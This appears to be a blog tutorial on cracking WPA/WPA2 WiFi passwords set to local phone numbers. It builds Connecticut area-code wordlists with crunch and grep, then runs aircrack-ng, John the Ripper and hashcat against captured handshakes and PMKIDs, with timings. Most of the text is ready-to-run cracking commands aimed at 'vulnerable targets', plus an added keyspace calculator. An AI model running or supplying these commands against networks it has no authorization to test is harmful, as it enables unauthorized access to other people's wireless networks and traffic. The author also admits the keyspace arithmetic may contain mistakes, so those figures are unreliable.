Cracking WiFi – phone number wordlist

I used to see a lot of networks set up where either the tech or the end user chose the person’s or business’s phone number as the password. So I usually try to test these first when trying to crack a WiFi password.

I was looking into more efficient ways to crack the password if you were working in a virtual machine and didn’t have access to a GPU cracking rig to run hashcat. You could pipe crunch to aircrack-ng on the fly and reduce some of the keyspace by prepending the area code:
crunch 10 10 -t 860%%%%%%% | aircrack-ng /root/handshake.cap -e MyESSID -w -
This results in testing 10 million different numbers. But you can reduce that keyspace and avoid unnecessary CPU time by pre-generating a wordlist with all the numbers and then removing the exchange prefixes that aren’t in use.

NANP (North American Numbering Plan) numbers are ten digits in length, in the format NXX-NXX-XXXX, where N is any digit 2-9 and X is any digit 0-9.
So any exchange prefix that starts with 0 or 1 can be removed, and any N11 service code (e.g. 411, 911) can be removed too, reducing the keyspace. Checking online databases of exchange listings for each state lets you reduce the keyspace even further by removing unused/reserved exchanges.
Also, as of September 2016, all 555 numbers have been returned to the NANPA inventory except 555-1212 (national use directory assistance) and 555-4334 (national use assigned). The fictitious, non-working numbers 555-0100 through 555-0199 will remain reserved for entertainment/advertising.
So keep in mind that we can remove another 102 entries per area code with the regex:
^86055501[0-9][0-9]|^8605551212|^8605554334
Connecticut doesn’t currently use the 555 prefix at all, though, so we’re going to remove the whole 555 prefix. Using crunch again and some regex grep’ing:

crunch 10 10 -t 860%%%%%%% > 860.txt
grep -vP "^860[01]|^860[2-9]11|^860[235679]00|^86093[1467]|^86095[089]|^860555\
|^86096[09]|^860976|^86098[01]|^86099[46]" 860.txt > 860numbers.txt
This knocks the results down to:
wc -l 860.txt 860numbers.txt
10000000 860.txt
7710000 860numbers.txt
reduced keyspace = 2,290,000

Now you’re thinking, shit, there’s usually more than one area code per state. For Connecticut there are 203, 860, 475, and 959. 959 doesn’t have any exchanges yet afaik, 475 has relatively few exchanges currently, and 203 actually has more exchanges in use than 860. So we just do the same thing for 203:

crunch 10 10 -t 203%%%%%%% > 203.txt
grep -vP "^203[01]|^203[2-9]11|^203[235679]00|^203203|^203475|^203555|^203700\
|^203860|^20395[089]|^203976|^203999" 203.txt > 203numbers.txt

This knocks the results down to:
10000000 203.txt
7770000 203numbers.txt
reduced keyspace = 2,230,000

After doing this for each area code, you can cat the files together to create a wordlist that you can pipe to aircrack-ng or John the Ripper. If you’re a lazy reader from Connecticut, I am attaching the compiled wordlist ::allctphonenumbers.zip (16.7 MB):: of all 860/203/475 area codes (15,760,000 total).
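As a check on the keyspace math above (an added example, not code from the original post), the following Python applies the two exclusion lists, transcribed from the grep commands, to the 1000 possible exchanges of each area code and reports what survives; the 1,500 guesses/s rate used in the demo is an assumed figure, not one from the post.

```python
import math
import re

# NANP numbers are NXX-NXX-XXXX; with the area code fixed, the keyspace is
# 1000 possible exchanges (000-999) x 10,000 line numbers each.
LINES_PER_EXCHANGE = 10_000

# Exclusion regexes transcribed from the grep -vP commands in the post. Each
# alternative anchors on area code + exchange, so matching the 6-digit prefix
# alone decides the fate of all 10,000 numbers behind it.
EXCLUDE_860 = re.compile(
    r"^860[01]|^860[2-9]11|^860[235679]00|^86093[1467]|^86095[089]"
    r"|^860555|^86096[09]|^860976|^86098[01]|^86099[46]"
)
EXCLUDE_203 = re.compile(
    r"^203[01]|^203[2-9]11|^203[235679]00|^203203|^203475|^203555"
    r"|^203700|^203860|^20395[089]|^203976|^203999"
)


def nanp_valid(number: str) -> bool:
    """Syntactic NANP check: N (2-9) in positions 1 and 4, digits elsewhere."""
    return re.fullmatch(r"[2-9]\d{2}[2-9]\d{6}", number) is not None


def surviving_exchanges(area_code: str, exclude: re.Pattern) -> list:
    """3-digit exchanges under area_code that the exclusion list does not remove."""
    return [f"{e:03d}" for e in range(1000) if not exclude.match(f"{area_code}{e:03d}")]


def keyspace(area_code: str, exclude: re.Pattern) -> dict:
    """Remaining candidate count, the reduction from 10^7, and guessing entropy in bits."""
    remaining = len(surviving_exchanges(area_code, exclude)) * LINES_PER_EXCHANGE
    return {
        "remaining": remaining,
        "removed": 10_000_000 - remaining,
        "bits": round(math.log2(remaining), 2),
    }


def seconds_to_exhaust(candidates: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a given guess rate (rate is an assumed input)."""
    return candidates / guesses_per_second


if __name__ == "__main__":
    for ac, ex in (("860", EXCLUDE_860), ("203", EXCLUDE_203)):
        ks = keyspace(ac, ex)
        # 1,500 guesses/s is an assumed CPU-only WPA2 rate, not a figure from the post
        mins = seconds_to_exhaust(ks["remaining"], 1_500) / 60
        print(ac, ks, f"~{mins:.0f} min at 1,500 guesses/s")
```

Even the reduced lists sit at under 23 bits of entropy, which is the number a defender should quote when explaining why a phone number is not an acceptable WPA2 passphrase.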

It shouldn’t take very long to test against a captured handshake to see if they used a phone number for the password. Using the 203 area code wordlist it took about 12 minutes, because it basically starts at the first phone number in the list (i.e. 2032000000).
aircrack-ng -w /root/ctphonenumbers203.txt /root/handshake.cap -e MyESSID

Or you can use John the Ripper. First convert the cap file using:
hcxhash2cap --pmkid=test.16800 -c handshake.cap
then
john -w:allctnumbers.txt --format=wpapsk --pot=pmkid.cracked.pot test.16800

It took about an hour on a VM to run through both area codes and crack it.


If you are lucky enough to be able to use hashcat, the remaining keyspace goes pretty quick with a good GPU, and you can also reduce the keyspace using custom charsets in a mask. With the charset mask covering the remaining 7 digits it took about 1 second to crack.

PMKID
hashcat -m 16800 handshake.16800 -a 3 -1 23456789 203?1?d?d?d?d?d?d -w 4 --force -O
hashcat -m 16800 handshake.16800 -a 3 -1 23456789 860?1?d?d?d?d?d?d -w 4 --force -O

WPA/WPA2
hashcat -m 2500 handshake.hccapx -a 3 -1 ?d -2 23456789 860?2?1?1?1?1?1?1 -w 4 --force -O
hashcat -m 2500 handshake.hccapx -a 3 -1 ?d -2 23456789 203?2?1?1?1?1?1?1 -w 4 --force -O

Yes, cracking WPA-PMKID with a wordlist can be slow:
with the 203 wordlist it took 53 seconds to crack;
brute-forcing PMKID with a charset mask on a GPU took one second 🙂
hashcat -m 16800 pkid.16800 -a 3 -1 23456789 203?1?d?d?d?d?d?d --force

So wordlists aren’t that great, but if you’re stuck on a sub-par PC and need something in a pinch it’s worth trying before you move on to larger wordlists etc. I’m writing this just as notes at 6 am, and I suck at math, so let me know in the comments if I have any mistakes in the calculations etc. Will be doing a follow-up article on how to capture PMKIDs on vulnerable targets.
Happy cracking.